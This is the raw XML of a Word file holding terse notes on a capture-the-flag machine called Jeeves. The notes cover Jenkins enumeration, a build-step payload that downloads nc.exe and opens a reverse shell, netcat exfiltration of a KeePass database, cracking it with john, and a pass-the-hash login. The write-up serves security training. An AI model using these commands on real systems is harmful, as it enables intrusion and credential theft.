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1D584E1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963FA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jeeves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29A06AD7" w14:textId="51B9418F" w:rsidR="0083492D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963FA1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1BD421DA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83492D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0083492D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sC -sV 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724CF538" w:rsidR="00843DCE" w:rsidRDefault="001E48A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feroxbuster –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00944518">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ip:50000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-w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -C 401 404 403 405 406 500 501 503 505 506 -K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="213698EC" w:rsidR="00843DCE" w:rsidRDefault="001E48A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then visit the askjeeves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C19B2" w14:textId="2DCCEA1C" w:rsidR="0034429E" w:rsidRDefault="0034429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start python server at the netcat nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD2E29" w14:textId="3994527A" w:rsidR="0034429E" w:rsidRDefault="0034429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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797246CB" w14:textId="29DB3899" w:rsidR="0034429E" w:rsidRDefault="0034429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nc -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97D92A" w14:textId="4707659B" w:rsidR="000434ED" w:rsidRDefault="000434E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website at the build function of build triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9292B" w14:textId="1B8CADEA" w:rsidR="000434ED" w:rsidRDefault="000434E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powershell wget “</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00944518">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our_ip/nc.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” -outfile “nc.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601881FF" w14:textId="74777206" w:rsidR="006E2CC9" w:rsidRDefault="006E2CC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nc.exe -e cmd.exe our_ip 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBF086" w14:textId="5C1D67CB" w:rsidR="00573AA8" w:rsidRDefault="00573AA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then click on build now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0C927" w14:textId="1291CB3F" w:rsidR="00573AA8" w:rsidRDefault="00573AA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the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF61F8" w14:textId="2ABFEE86" w:rsidR="00061C43" w:rsidRDefault="00061C4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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B85E995" w14:textId="77777777" w:rsidR="0034429E" w:rsidRDefault="0034429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2EA677FD" w:rsidR="00843DCE" w:rsidRDefault="00A8603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the Document we notice the CEH.kbdx</w:t>
      </w:r>
      <w:r w:rsidR="00863C3A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is ke</w:t>
      </w:r>
      <w:r w:rsidR="002A0B84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00863C3A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pass database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922CFE8" w14:textId="42C0690B" w:rsidR="00843DCE" w:rsidRDefault="00FB04D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take it ot kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666EFA0E" w14:textId="0AAB874A" w:rsidR="00FB04DF" w:rsidRDefault="00FB04D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nc -lvnp 5555</w:t>
      </w:r>
      <w:r w:rsidR="00E61464">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; jeeves.kd</w:t>
      </w:r>
      <w:r w:rsidR="00BE7582">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00E61464">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6C1D0" w14:textId="73281A49" w:rsidR="00FB04DF" w:rsidRDefault="00B32A7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copy C:\Users\workspace\Administrator\.jenkins/workspace\Jenkins\nc.exe</w:t>
      </w:r>
      <w:r w:rsidR="00D9130F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E50AE2" w14:textId="6553F25E" w:rsidR="00FB04DF" w:rsidRDefault="0042120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move the nc.exe to the document location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEED7A3" w14:textId="10A493E8" w:rsidR="00B026FC" w:rsidRDefault="0042120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nc.exe -w</w:t>
      </w:r>
      <w:r w:rsidR="00C027C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> our_ip 5555 &lt; CEH.kdbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9F5931" w14:textId="2AC3881E" w:rsidR="00B026FC" w:rsidRDefault="008D219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keepass2john jeeves.kbdx &gt; jeeves.hash</w:t>
      </w:r>
      <w:r w:rsidR="00DA4656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we just convert file to crackable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F433CF" w14:textId="3D37838D" w:rsidR="00327F5E" w:rsidRDefault="005E1AF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john - -wordlist=/xx/xx/xx/rockyou.txt jeeves.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA6BF4" w14:textId="4ED94C96" w:rsidR="00184275" w:rsidRDefault="0018427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pass = moonshine1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375995D6" w14:textId="6DE4E6F9" w:rsidR="00B026FC" w:rsidRDefault="007B7F9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apt install keepassxc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C835C" w14:textId="50CF4004" w:rsidR="0052563A" w:rsidRDefault="0052563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keepassxc jeeves.kdbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6A94C" w14:textId="2D9F548D" w:rsidR="00FD580D" w:rsidRDefault="00FD580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open the backup.stuff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE3F2BE" w14:textId="07CE00AD" w:rsidR="00FD580D" w:rsidRDefault="00FD580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change username with the administrator</w:t>
      </w:r>
      <w:r w:rsidR="007E0505">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we obtain the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D924FC1" w14:textId="4862486C" w:rsidR="00C447C0" w:rsidRDefault="00C447C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pth-winexe -U jeeves/Administrator%</w:t>
      </w:r>
      <w:r w:rsidR="00AF7717">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>full_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash //ip cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C29D782" w14:textId="5FD58B4D" w:rsidR="001D3DF5" w:rsidRDefault="001D3DF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here jeeves is domain, administrator is username and the hash</w:t>
      </w:r>
      <w:r w:rsidR="00592545">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, cmd for take cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976B8BF" w14:textId="2F13CEC2" w:rsidR="00B026FC" w:rsidRDefault="00BF27D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when we notice the Desktop we obtain flag is somewhere deeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B3A71D" w14:textId="28808AB8" w:rsidR="00DF70D7" w:rsidRDefault="00DF70D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dir /R</w:t>
      </w:r>
      <w:r w:rsidR="00F73D04">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = we notice hm.txt:root.txt:$DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFA23A" w14:textId="4695E16A" w:rsidR="00F73D04" w:rsidRDefault="00F73D0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powershell get-Content -Path “hm.txt” -Stream “root.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDCE7B5" w14:textId="77777777" w:rsidR="00B026FC" w:rsidRDefault="00B026FC" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B704ED5" w14:textId="77777777" w:rsidR="00B026FC" w:rsidRDefault="00B026FC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5074E486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4214A56" w14:textId="5BE3E27E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9. Lessons Learned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434ED"/>
    <w:rsid w:val="00061C43"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00184275"/>
    <w:rsid w:val="001D3DF5"/>
    <w:rsid w:val="001E48A7"/>
    <w:rsid w:val="002A0B84"/>
    <w:rsid w:val="00327F5E"/>
    <w:rsid w:val="0033144B"/>
    <w:rsid w:val="0034429E"/>
    <w:rsid w:val="00421206"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="0052563A"/>
    <w:rsid w:val="00573AA8"/>
    <w:rsid w:val="00592545"/>
    <w:rsid w:val="005E1AF1"/>
    <w:rsid w:val="006E2CC9"/>
    <w:rsid w:val="007B7F93"/>
    <w:rsid w:val="007E0505"/>
    <w:rsid w:val="0083492D"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00863C3A"/>
    <w:rsid w:val="008D219E"/>
    <w:rsid w:val="009530BA"/>
    <w:rsid w:val="00963FA1"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A86039"/>
    <w:rsid w:val="00AF7717"/>
    <w:rsid w:val="00B026FC"/>
    <w:rsid w:val="00B32A7B"/>
    <w:rsid w:val="00BE7582"/>
    <w:rsid w:val="00BF27D9"/>
    <w:rsid w:val="00C027C2"/>
    <w:rsid w:val="00C447C0"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D9130F"/>
    <w:rsid w:val="00DA4656"/>
    <w:rsid w:val="00DF70D7"/>
    <w:rsid w:val="00E61464"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F73D04"/>
    <w:rsid w:val="00FB04DF"/>
    <w:rsid w:val="00FD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4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our_ip/nc.exe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip:50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38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-18T12:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>